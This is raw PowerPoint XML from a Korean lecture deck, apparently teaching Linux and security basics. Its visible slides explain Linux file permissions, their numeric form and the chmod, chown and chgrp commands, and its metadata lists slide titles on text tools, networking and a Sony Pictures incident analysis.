            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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소유자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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소유</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>그룹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>링크일시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:t>7</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T3/Permission </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 권한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>그룹</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>호에 들어올 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공용 책장을 만질 수 있다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>X</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>호에 들어올 수 있다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공용 책장을 만질 수 있다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T3/Permission </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 권한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>권한의 수치화</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1">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a:t>파일의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>권한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>소유자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>소유그룹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 을 바꿀 수 있을까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>? =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>chgrp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">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48598</TotalTime>
  <Words>35397</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>7968</Paragraphs>
  <Slides>436</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>사용한 글꼴</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>23</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>테마</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>슬라이드 제목</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>436</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="460" baseType="lpstr">
      <vt:lpstr>Apple SD Gothic Neo</vt:lpstr>
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>HY중고딕</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>Spoqa Han Sans</vt:lpstr>
      <vt:lpstr>Ubuntu Condensed</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/Theory/T2/27  # awk : 문장 중 특정 단어로의 split</vt:lpstr>
      <vt:lpstr>/Theory/T2/28  # sort : 정렬</vt:lpstr>
      <vt:lpstr>/Theory/T2/29  # uniq : 중복이 없는 sort</vt:lpstr>
      <vt:lpstr>/Theory/T2/30  # sed : 비대화형 편집기</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/Theory/T16   OSI 7 계층</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   BGP 프로토콜</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석 – 데이터 다운</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석 – 데이터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백 도우</cp:lastModifiedBy>
  <cp:revision>810</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-13T07:39:51Z</dcterms:modified>
</cp:coreProperties>
</file>